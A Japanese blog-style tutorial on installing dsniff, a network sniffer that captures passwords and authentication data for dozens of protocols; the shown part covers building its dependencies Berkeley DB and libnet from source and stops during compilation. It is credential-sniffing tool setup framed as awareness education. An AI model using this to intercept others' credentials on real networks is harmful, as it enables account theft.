2022年8月、ホームページを全面リニューアルしました! 情報を分かりやすくお伝えできるサイト作りを目指してまいります。

dsniffで認証情報を盗聴する!

ここの文章の目的は、単にクラッキングツールの紹介ではない。クラッキング手法というのは、如何に恐ろしいかと言うことをみなさんに知って貰うため、書き記した。
みなさんは、Snifferと言うツールを知ってるだろうか?直訳すると「嗅ぎつける」とかの訳になる。ネットワーク上に行き交うパケットを解析して盗聴するツール。一言で書くが実際に使ってみると非常に恐ろしいツールである。パケットを盗聴してパスワードをゲットできてしまう、と言う悪人にとっては好都合の道具である。ここで紹介するSnifferは、 dsniff というSnifferソフトのインストールと使い方を説明する。dsniffは、インストールに少々コツが要るので良く読んで作業することをお勧めする。
そして、改めて忠告する!ここで説明することは、パスワードクラッキングの恐ろしさを初心者諸君に体験して貰うために有るのであり悪用しては絶対にいけない!ここに誓っていただきたい!
注:
dsniffは沢山使い方があるが、悪用する馬鹿な輩のために、ここでは一種類の使い方しか紹介しない事を予め了解していただきたい。

dsniffとは:
パスワードを嗅ぎつけるツール。
FTP、Telnet、SMTP、HTTP、POP、poppass、NNTP、IMAP、SNMP、LDAP、rlogin、RIP、OSPF、PPTP MS-CHAP、NFS、VRRP、YP/NIS、SOCKS、X11、CVS、IRC、AIM、ICQ、ナップスター、PostgreSQL、シトリックスのICA、シマンテックpcAnywhere、NAIスニッファー、マイクロソフトSMB、Oracle SQL*Net、Sybaseそして、マイクロソフトSQL 認証情報。
dsniffは自動的に各アプリケーション・プロトコルをそれぞれ最小に構文解析し、ユニークな認証の試みを記録して、その出力ファイル形式としてBerkeleyDBを使用する。

インストール・テスト環境:
wirehork:~# more /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 7
model name : Pentium III (Katmai)
stepping : 3
cpu MHz : 598.663
cache size : 512 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov p
at pse36 mmx fxsr sse up
bogomips : 1198.45
clflush size : 32

wirehork:~# lspci
00:00.0 Host bridge: Intel Corporation 440BX/ZX/DX – 82443BX/ZX/DX Host bridge (rev 03)
00:01.0 PCI bridge: Intel Corporation 440BX/ZX/DX – 82443BX/ZX/DX AGP bridge (rev 03)
00:07.0 ISA bridge: Intel Corporation 82371AB/EB/MB PIIX4 ISA (rev 02)
00:07.1 IDE interface: Intel Corporation 82371AB/EB/MB PIIX4 IDE (rev 01)
00:07.2 USB Controller: Intel Corporation 82371AB/EB/MB PIIX4 USB (rev 01)
00:07.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 02)
00:0e.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10)
01:00.0 VGA compatible controller: nVidia Corporation NV5 [RIVA TNT2/TNT2 Pro] (rev 11)

wirehork:~# uname -a
Linux wirehork 2.6.21-2-686 #1 Debian GNU/Linux

1.インストールする前に
dsniffをインストールする前に、以下のモジュールを入れておかなければならない。
libpcap libnet libnids Berkeley DB with 1.85 compatibility
Berkeley DB – http://www.oracle.com/technology/software/products/berkeley-db/db/index.html
OpenSSL – http://www.openssl.org/
libpcap – http://www.tcpdump.org/
libnids – http://www.packetfactory.net/Projects/Libnids/
libnet – http://www.packetfactory.net/Projects/Libnet/

1)BerkeleyDBのインストール
BerkeleyDBは、sleepycatから Oracle の管理下になった。個人的な私見だがBerkeleyDBはVersion3系をインストールする方がいいと思た。デストリビューションのバイナリよりソースから入れることをお勧めする。
wirehork:~# cd /usr/local/src/

wirehork:/usr/local/src# wget http://download.oracle.com/berkeley-db/db-3.0.55.tar.gz
–14:10:44– http://download.oracle.com/berkeley-db/db-3.0.55.tar.gz
=> `db-3.0.55.tar.gz’
Resolving download.oracle.com… 203.77.185.21, 203.77.185.22, 203.77.185.20
Connecting to download.oracle.com|203.77.185.21|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1,622,763 (1.5M) [application/x-tar]

100%[====================================>] 1,622,763 1.75M/s

14:10:45 (1.75 MB/s) – `db-3.0.55.tar.gz’ saved [1622763/1622763]

wirehork:/usr/local/src# tar zxvf db-3.0.55.tar.gz

wirehork:/usr/local/src# chown -R root.root db-3.0.55

wirehork:/usr/local/src# cd db-3.0.55

wirehork:/usr/local/src/db-3.0.55# cd build_unix

wirehork:/usr/local/src/db-3.0.55/build_unix#

wirehork:/usr/local/src/db-3.0.55/build_unix# ../dist/configure –prefix=/usr –enable-compat185
loading cache ./config.cache
checking for a BSD compatible install… (cached) /usr/bin/install -c
checking host system type… i686-pc-linux-gnu
checking if building in the top-level directory… no
checking if –disable-bigfile option specified… no
checking if –enable-compat185 option specified… yes
checking if –enable-cxx option specified… no
checking if –enable-debug option specified… no
checking if –enable-debug_rop option specified… no
checking if –enable-debug_wop option specified… no
checking if –enable-diagnostic option specified… no
checking if –enable-dump185 option specified… no
checking if –enable-dynamic option specified… no
checking if –enable-java option specified… no
checking if –enable-posixmutexes option specified… no
checking if –enable-shared option specified… no
checking if –enable-tcl option specified… no
checking if –enable-test option specified… no
checking if –enable-uimutexes option specified… no
checking for cc… (cached) cc
checking for gcc… (cached) cc
checking for gcc… (cached) cc
checking whether the C compiler (cc -O2 ) works… yes
checking whether the C compiler (cc -O2 ) is a cross-compiler… no
checking whether we are using GNU C… (cached) yes
checking whether cc accepts -g… (cached) yes
checking whether byte ordering is bigendian… (cached) no
checking for working const… (cached) yes
checking how to run the C preprocessor… (cached) cc -E
checking whether stat file-mode macros are broken… (cached) no
checking whether time.h and sys/time.h may both be included… (cached) yes
checking for st_blksize in struct stat… (cached) yes
checking for ANSI C header files… (cached) yes
checking for mode_t… (cached) yes
checking for off_t… (cached) yes
checking for pid_t… (cached) yes
checking for size_t… (cached) yes
checking for ssize_t… (cached) yes
checking for u_char… (cached) yes
checking for u_short… (cached) yes
checking for u_int… (cached) yes
checking for u_long… (cached) yes
checking for u_int8_t… (cached) yes
checking for u_int16_t… (cached) yes
checking for int16_t… (cached) yes
checking for u_int32_t… (cached) yes
checking for int32_t… (cached) yes
checking for dirent.h that defines DIR… (cached) yes
checking for opendir in -ldir… (cached) no
checking for sys/select.h… (cached) yes
checking for sys/time.h… (cached) yes
checking for mutexes… (cached) POSIX/pthreads/library
checking for getcwd… (cached) yes
checking for getopt… (cached) yes
checking for memcmp… (cached) yes
checking for memcpy… (cached) yes
checking for memmove… (cached) yes
checking for raise… (cached) yes
checking for snprintf… (cached) yes
checking for strerror… (cached) yes
checking for vsnprintf… (cached) yes
checking for getuid… (cached) yes
checking for pread… (cached) yes
checking for pstat_getdynamic… (cached) no
checking for sysconf… (cached) yes
checking for sched_yield… (cached) yes
checking for yield… (cached) no
checking for sigfillset… (cached) yes
checking for fcntl/F_SETFD… (cached) yes
checking for qsort… (cached) yes
checking for select… (cached) yes
checking for int type sprintf return value… (cached) yes
checking for mlock… (cached) yes
checking for munlock… (cached) yes
checking for mmap… (cached) yes
checking for munmap… (cached) yes
checking for shmget… (cached) yes
checking for ar… (cached) /usr/bin/ar
checking for chmod… (cached) /bin/chmod
checking for cp… (cached) /bin/cp
checking for ln… (cached) /bin/ln
checking for mkdir… (cached) /bin/mkdir
checking for ranlib… (cached) /usr/bin/ranlib
checking for rm… (cached) /bin/rm
checking for sh… (cached) /bin/sh
checking for strip… (cached) /usr/bin/strip
updating cache ./config.cache
creating ./config.status
creating Makefile
creating include.tcl
creating db.h
creating db_int.h
creating db_185.h
creating db_config.h
db_config.h is unchanged

wirehork:/usr/local/src/db-3.0.55/build_unix# make
cc -c -O2 -I. -I../dist/../include -D_REENTRANT ../dist/../db185/db185.c
/usr/bin/ar cr libdb.a mut_pthread.o db185.o bt_compare.o bt_conv.o bt_curadj.o bt_cursor.o bt_delete.o bt_method.o bt_open.o bt_put.o bt_rec.o bt_reclaim.o bt_recno.o bt_rsearch.o bt_search.o bt_split.o bt_stat.o bt_upgrade.o btree_auto.o crdel_auto.o crdel_rec.o db.o db_am.o db_auto.o db_byteorder.o db_conv.o db_dispatch.o db_dup.o db_err.o db_getlong.o db_iface.o db_join.o db_log2.o db_meta.o db_method.o db_overflow.o db_pr.o db_rec.o db_reclaim.o db_ret.o db_salloc.o db_shash.o db_upgrade.o dbm.o env_method.o env_open.o env_recover.o env_region.o hash.o hash_auto.o hash_conv.o hash_dup.o hash_func.o hash_meta.o hash_method.o hash_page.o hash_rec.o hash_reclaim.o hash_stat.o hash_upgrade.o hsearch.o lock.o lock_conflict.o lock_deadlock.o lock_region.o lock_util.o log.o log_archive.o log_auto.o log_compare.o log_findckp.o log_get.o log_method.o log_put.o log_rec.o log_register.o mp_alloc.o mp_bh.o mp_fget.o mp_fopen.o mp_fput.o mp_fset.o mp_method.o mp_region.o mp_register.o mp_stat.o mp_sync.o mp_trickle.o mutex.o os_abs.o os_alloc.o os_dir.o os_errno.o os_fid.o os_finit.o os_fsync.o os_handle.o os_map.o os_method.o os_oflags.o os_open.o os_region.o os_rename.o os_root.o os_rpath.o os_rw.o os_seek.o os_sleep.o os_spin.o os_stat.o os_tmpdir.o os_unlink.o qam.o qam_auto.o qam_conv.o qam_method.o qam_open.o qam_rec.o qam_stat.o txn.o txn_auto.o txn_rec.o txn_region.o xa.o xa_db.o xa_map.o
test ! -f /usr/bin/ranlib || /usr/bin/ranlib libdb.a
cc -o db_archive db_archive.o libdb.a -lpthread
cc -o db_checkpoint db_checkpoint.o libdb.a -lpthread
cc -o db_deadlock db_deadlock.o libdb.a -lpthread
cc -o db_dump db_dump.o libdb.a -lpthread
cc -o db_load db_load.o libdb.a -lpthread
cc -o db_printlog db_printlog.o libdb.a -lpthread
cc -o db_recover db_recover.o libdb.a -lpthread
cc -o db_stat db_stat.o libdb.a -lpthread

wirehork:/usr/local/src/db-3.0.55/build_unix# make install
Installing DB include files: /usr/include …
Installing DB library: /usr/lib …
Installing DB utilities: /usr/bin …
Installing documentation: /usr/docs …

wirehork:/usr/local/src/db-3.0.55/build_unix# cd ../../

2)libnetのインストール
libnet は、Version1.0.2aをインストールすること。
wirehork:/usr/local/src# wget http://www.packetfactory.net/libnet/dist/deprecated/libnet-1.0.2a.tar.gz
–14:33:10– http://www.packetfactory.net/libnet/dist/deprecated/libnet-1.0.2a.tar.gz
=> `libnet-1.0.2a.tar.gz’
Resolving www.packetfactory.net… 69.42.82.105
Connecting to www.packetfactory.net|69.42.82.105|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 140,191 (137K) [application/x-gzip]

100%[========================================>] 140,191 105.23K/s

14:33:13 (104.92 KB/s) – `libnet-1.0.2a.tar.gz’ saved [140191/140191]

wirehork:/usr/local/src# tar zxvf libnet-1.0.2a.tar.gz
Libnet-1.0.2a/
Libnet-1.0.2a/Makefile.in
Libnet-1.0.2a/README
Libnet-1.0.2a/VERSION
Libnet-1.0.2a/acconfig.h
Libnet-1.0.2a/acinclude.m4
Libnet-1.0.2a/aclocal.m4
Libnet-1.0.2a/config.guess
Libnet-1.0.2a/config.sub
Libnet-1.0.2a/configure
Libnet-1.0.2a/configure.in
Libnet-1.0.2a/ensure-dir.sh
Libnet-1.0.2a/install-sh
Libnet-1.0.2a/libnet-config.in
Libnet-1.0.2a/doc/
Libnet-1.0.2a/doc/CHANGELOG
Libnet-1.0.2a/doc/CHANGELOG-NEWFUNCTIONS
Libnet-1.0.2a/doc/COPYING
Libnet-1.0.2a/doc/README
Libnet-1.0.2a/doc/TODO-1.0
Libnet-1.0.2a/doc/TODO-1.1
Libnet-1.0.2a/doc/libnet.3
Libnet-1.0.2a/doc/Ancillary/
Libnet-1.0.2a/doc/Ancillary/README.asn.1
Libnet-1.0.2a/doc/Ancillary/README.bpf
Libnet-1.0.2a/doc/Ancillary/README.legacy-applications
Libnet-1.0.2a/doc/Ancillary/README.libnet-config
Libnet-1.0.2a/doc/Ancillary/README.linux
Libnet-1.0.2a/doc/Ancillary/README.rawsockets
Libnet-1.0.2a/example/
Libnet-1.0.2a/example/Makefile.in
Libnet-1.0.2a/example/libnet-example-1.c
Libnet-1.0.2a/example/libnet-example-2.c
Libnet-1.0.2a/example/libnet-example-3.c
Libnet-1.0.2a/example/libnet-example-4.c
Libnet-1.0.2a/include/
Libnet-1.0.2a/include/bpf.h
Libnet-1.0.2a/include/config.h.in
Libnet-1.0.2a/include/gnuc.h
Libnet-1.0.2a/include/ifaddrlist.h
Libnet-1.0.2a/include/libnet.h
Libnet-1.0.2a/include/libnet/
Libnet-1.0.2a/include/libnet/libnet-asn1.h
Libnet-1.0.2a/include/libnet/libnet-functions.h
Libnet-1.0.2a/include/libnet/libnet-headers.h
Libnet-1.0.2a/include/libnet/libnet-macros.h
Libnet-1.0.2a/include/libnet/libnet-ospf.h
Libnet-1.0.2a/include/libnet/libnet-structures.h
Libnet-1.0.2a/lib/
Libnet-1.0.2a/misc/
Libnet-1.0.2a/misc/libnet.s2h
Libnet-1.0.2a/ports/
Libnet-1.0.2a/ports/Linux/
Libnet-1.0.2a/ports/Linux/Redhat-RPM/
Libnet-1.0.2a/ports/Linux/Redhat-RPM/libnet.spec
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/Makefile
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/files/
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/files/CVS/
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/files/CVS/Root
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/files/CVS/Repository
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/files/CVS/Entries
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/files/md5
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/patches/
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/patches/CVS/
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/patches/CVS/Root
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/patches/CVS/Repository
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/patches/CVS/Entries
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/pkg/
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/pkg/CVS/
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/pkg/CVS/Root
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/pkg/CVS/Repository
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/pkg/CVS/Entries
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/pkg/COMMENT
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/pkg/DESCR
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/pkg/PLIST
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/work/
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/work/CVS/
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/work/CVS/Root
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/work/CVS/Repository
Libnet-1.0.2a/ports/OpenBSD-FreeBSD/Libnet/work/CVS/Entries
Libnet-1.0.2a/src/
Libnet-1.0.2a/src/CVS/
Libnet-1.0.2a/src/CVS/Root
Libnet-1.0.2a/src/CVS/Repository
Libnet-1.0.2a/src/CVS/Entries
Libnet-1.0.2a/src/libnet_asn1.c
Libnet-1.0.2a/src/libnet_build_arp.c
Libnet-1.0.2a/src/libnet_build_dns.c
Libnet-1.0.2a/src/libnet_build_ethernet.c
Libnet-1.0.2a/src/libnet_build_icmp.c
Libnet-1.0.2a/src/libnet_build_igmp.c
Libnet-1.0.2a/src/libnet_build_ip.c
Libnet-1.0.2a/src/libnet_build_ospf.c
Libnet-1.0.2a/src/libnet_build_rip.c
Libnet-1.0.2a/src/libnet_build_snmp.c
Libnet-1.0.2a/src/libnet_build_tcp.c
Libnet-1.0.2a/src/libnet_build_udp.c
Libnet-1.0.2a/src/libnet_checksum.c
Libnet-1.0.2a/src/libnet_error.c
Libnet-1.0.2a/src/libnet_hex_dump.c
Libnet-1.0.2a/src/libnet_prand.c
Libnet-1.0.2a/src/libnet_if_addr.c
Libnet-1.0.2a/src/libnet_insert_ipo.c
Libnet-1.0.2a/src/libnet_insert_tcpo.c
Libnet-1.0.2a/src/libnet_link_bpf.c
Libnet-1.0.2a/src/libnet_link_dlpi.c
Libnet-1.0.2a/src/libnet_link_nit.c
Libnet-1.0.2a/src/libnet_link_pf.c
Libnet-1.0.2a/src/libnet_link_snit.c
Libnet-1.0.2a/src/libnet_link_snoop.c
Libnet-1.0.2a/src/libnet_link_sockpacket.c
Libnet-1.0.2a/src/libnet_packet_mem.c
Libnet-1.0.2a/src/libnet_port_list.c
Libnet-1.0.2a/src/libnet_resolve.c
Libnet-1.0.2a/src/libnet_socket.c
Libnet-1.0.2a/src/libnet_version.c
Libnet-1.0.2a/src/libnet_write_ip.c
Libnet-1.0.2a/src/libnet_build_vrrp.c
Libnet-1.0.2a/support/
Libnet-1.0.2a/support/bpf-lkm/
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/CVS/
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/CVS/Root
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/CVS/Repository
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/CVS/Entries
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/Makefile
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/README
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/diff.if_ethersubr.c
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/ether_mod.c
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/ether_mod_load.c
Libnet-1.0.2a/support/bpf-lkm/FreeBSD/4.0-ether.diff
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/CVS/
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/CVS/Root
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/CVS/Repository
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/CVS/Entries
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/Makefile.in
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/README
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/configure.in
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/ether_mod-2.4.c
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/ether_mod-2.5.c
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/ether_mod-2.6.c
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/ether_mod-2.7.c
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/ether_mod_load.c
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/etherspoof-kernel-2.7.diff
Libnet-1.0.2a/support/bpf-lkm/OpenBSD/OpenBSD
Libnet-1.0.2a/test/
Libnet-1.0.2a/test/Makefile.in
Libnet-1.0.2a/test/libnet_test.h
Libnet-1.0.2a/test/test-step.sh
Libnet-1.0.2a/test/Ethernet/
Libnet-1.0.2a/test/Ethernet/CVS/
Libnet-1.0.2a/test/Ethernet/CVS/Root
Libnet-1.0.2a/test/Ethernet/CVS/Repository
Libnet-1.0.2a/test/Ethernet/CVS/Entries
Libnet-1.0.2a/test/Ethernet/Makefile.in
Libnet-1.0.2a/test/Ethernet/arp.c
Libnet-1.0.2a/test/Ethernet/get_address.c
Libnet-1.0.2a/test/Ethernet/icmp_mask.c
Libnet-1.0.2a/test/Ethernet/poink.c
Libnet-1.0.2a/test/Ethernet/tcp.c
Libnet-1.0.2a/test/ICMP/
Libnet-1.0.2a/test/ICMP/CVS/
Libnet-1.0.2a/test/ICMP/CVS/Root
Libnet-1.0.2a/test/ICMP/CVS/Repository
Libnet-1.0.2a/test/ICMP/CVS/Entries
Libnet-1.0.2a/test/ICMP/Makefile.in
Libnet-1.0.2a/test/ICMP/icmp_echo.c
Libnet-1.0.2a/test/ICMP/icmp_timestamp.c
Libnet-1.0.2a/test/ICMP/icmp_timexceed.c
Libnet-1.0.2a/test/ICMP/icmp_unreach.c
Libnet-1.0.2a/test/ICMP/ping_of_death.c
Libnet-1.0.2a/test/ICMP/silvertongue.c
Libnet-1.0.2a/test/IP/
Libnet-1.0.2a/test/IP/CVS/
Libnet-1.0.2a/test/IP/CVS/Root
Libnet-1.0.2a/test/IP/CVS/Repository
Libnet-1.0.2a/test/IP/CVS/Entries
Libnet-1.0.2a/test/IP/Makefile.in
Libnet-1.0.2a/test/OSPF/
Libnet-1.0.2a/test/OSPF/CVS/
Libnet-1.0.2a/test/OSPF/CVS/Root
Libnet-1.0.2a/test/OSPF/CVS/Repository
Libnet-1.0.2a/test/OSPF/CVS/Entries
Libnet-1.0.2a/test/OSPF/Makefile.in
Libnet-1.0.2a/test/OSPF/ospf_hello.c
Libnet-1.0.2a/test/OSPF/ospf_lsa.c
Libnet-1.0.2a/test/OSPF/ospf_request.c
Libnet-1.0.2a/test/Random/
Libnet-1.0.2a/test/Random/CVS/
Libnet-1.0.2a/test/Random/CVS/Root
Libnet-1.0.2a/test/Random/CVS/Repository
Libnet-1.0.2a/test/Random/CVS/Entries
Libnet-1.0.2a/test/Random/Makefile.in
Libnet-1.0.2a/test/Random/hook.c
Libnet-1.0.2a/test/Random/prand_trials.c
Libnet-1.0.2a/test/TCP/
Libnet-1.0.2a/test/TCP/CVS/
Libnet-1.0.2a/test/TCP/CVS/Root
Libnet-1.0.2a/test/TCP/CVS/Repository
Libnet-1.0.2a/test/TCP/CVS/Entries
Libnet-1.0.2a/test/TCP/Makefile.in
Libnet-1.0.2a/test/TCP/syn-flood.c
Libnet-1.0.2a/test/TCP/tcp+data+ipopt.c
Libnet-1.0.2a/test/TCP/tcp+data.c
Libnet-1.0.2a/test/TCP/tcp.c
Libnet-1.0.2a/test/UDP/
Libnet-1.0.2a/test/UDP/CVS/
Libnet-1.0.2a/test/UDP/CVS/Root
Libnet-1.0.2a/test/UDP/CVS/Repository
Libnet-1.0.2a/test/UDP/CVS/Entries
Libnet-1.0.2a/test/UDP/Makefile.in
Libnet-1.0.2a/test/UDP/udp+data.c
Libnet-1.0.2a/test/UDP/udp.c
Libnet-1.0.2a/util/
Libnet-1.0.2a/util/Makefile.in
Libnet-1.0.2a/util/README
Libnet-1.0.2a/util/Get-mac/
Libnet-1.0.2a/util/Get-mac/Makefile.in
Libnet-1.0.2a/util/Get-mac/get_mac.c
Libnet-1.0.2a/config.sub-new

wirehork:/usr/local/src# chown -R root.root Libnet-1.0.2a

wirehork:/usr/local/src# cd Libnet-1.0.2a

wirehork:/usr/local/src/Libnet-1.0.2a# ./configure
creating cache ./config.cache
Beginning autoconfiguration process for libnet-1.0.2a…
checking host system type… i686-pc-linux-gnu
checking target system type… i686-pc-linux-gnu
checking build system type… i686-pc-linux-gnu
checking for gcc… gcc
checking whether the C compiler (gcc ) works… yes
checking whether the C compiler (gcc ) is a cross-compiler… no
checking whether we are using GNU C… yes
checking whether gcc accepts -g… yes
checking for working const… yes
checking for a BSD compatible install… /usr/bin/install -c
checking whether make sets ${MAKE}… yes
checking for ranlib… ranlib
checking for ar… ar
checking for ln… ln
checking for strerror… yes
checking for pcap_open_live in -lpcap… yes
checking low-level packet interface type… found SOCK_PACKET
checking how to run the C preprocessor… gcc -E
checking for net/ethernet.h… yes
checking for libnet_build_ip in -lnet… no
checking machine endianess… lil
checking if unaligned accesses fail… no
checking for sys/sockio.h… no
updating cache ./config.cache
creating ./config.status
creating Makefile
creating test/Makefile
creating test/TCP/Makefile
creating test/Ethernet/Makefile
creating test/UDP/Makefile
creating test/ICMP/Makefile
creating test/Random/Makefile
creating test/OSPF/Makefile
creating util/Makefile
creating util/Get-mac/Makefile
creating example/Makefile
creating libnet-config
creating include/config.h

wirehork:/usr/local/src/Libnet-1.0.2a# make
sed -e ‘s/.*/#define VERSION “&”/’ ./VERSION > version.h
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_resolve.c -o src/libnet_resolve.o
src/libnet_resolve.c: In function ‘libnet_host_lookup’:
src/libnet_resolve.c:67: warning: pointer targets in passing argument 1 of ‘sprintf’ differ in signedness
src/libnet_resolve.c:71: warning: pointer targets in passing argument 1 of ‘__builtin_strncpy’ differ in signedness
src/libnet_resolve.c: In function ‘libnet_host_lookup_r’:
src/libnet_resolve.c:95: warning: pointer targets in passing argument 1 of ‘sprintf’ differ in signedness
src/libnet_resolve.c:100: warning: pointer targets in passing argument 1 of ‘__builtin_strncpy’ differ in signedness
src/libnet_resolve.c: In function ‘libnet_name_resolve’:
src/libnet_resolve.c:116: warning: pointer targets in passing argument 1 of ‘inet_addr’ differ in signedness
src/libnet_resolve.c:118: warning: pointer targets in passing argument 1 of ‘gethostbyname’ differ in signedness
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_socket.c -o src/libnet_socket.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_checksum.c -o src/libnet_checksum.o
src/libnet_checksum.c: In function ‘libnet_do_checksum’:
src/libnet_checksum.c:98: warning: dereferencing type-punned pointer will break strict-aliasing rules
src/libnet_checksum.c:110: warning: dereferencing type-punned pointer will break strict-aliasing rules
src/libnet_checksum.c:200: warning: comparison is always false due to limited range of data type
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_prand.c -o src/libnet_prand.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_version.c -o src/libnet_version.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_write_ip.c -o src/libnet_write_ip.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_insert_ipo.c -o src/libnet_insert_ipo.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_insert_tcpo.c -o src/libnet_insert_tcpo.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_error.c -o src/libnet_error.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_link_sockpacket.c -o src/libnet_link_sockpacket.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_packet_mem.c -o src/libnet_packet_mem.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_ip.c -o src/libnet_build_ip.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_tcp.c -o src/libnet_build_tcp.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_udp.c -o src/libnet_build_udp.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_arp.c -o src/libnet_build_arp.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_ethernet.c -o src/libnet_build_ethernet.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_icmp.c -o src/libnet_build_icmp.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_igmp.c -o src/libnet_build_igmp.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_dns.c -o src/libnet_build_dns.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_snmp.c -o src/libnet_build_snmp.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_rip.c -o src/libnet_build_rip.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_ospf.c -o src/libnet_build_ospf.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_build_vrrp.c -o src/libnet_build_vrrp.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_asn1.c -o src/libnet_asn1.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_hex_dump.c -o src/libnet_hex_dump.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_if_addr.c -o src/libnet_if_addr.o
gcc -O2 -funroll-loops -fomit-frame-pointer -Wall -DHAVE_CONFIG_H -c src/libnet_port_list.c -o src/libnet_port_list.o
src/libnet_port_list.c: In function ‘libnet_plist_chain_dump_string’:
src/libnet_port_list.c:259: warning: pointer targets in passing argument 1 of ‘sprintf’ differ in signedness
src/libnet_port_list.c:263: warning: pointer targets in passing argument 1 of ‘sprintf’ differ in signedness
src/libnet_port_list.c:268: warning: pointer targets in passing argument 1 of ‘sprintf’ differ in signedness
src/libnet_port_list.c:271: warning: pointer targets in passing argument 1 of ‘strlen’ differ in signedness
src/libnet_port_list.c:271: warning: pointer targets in passing argument 1 of ‘__strdup’ differ in signedness
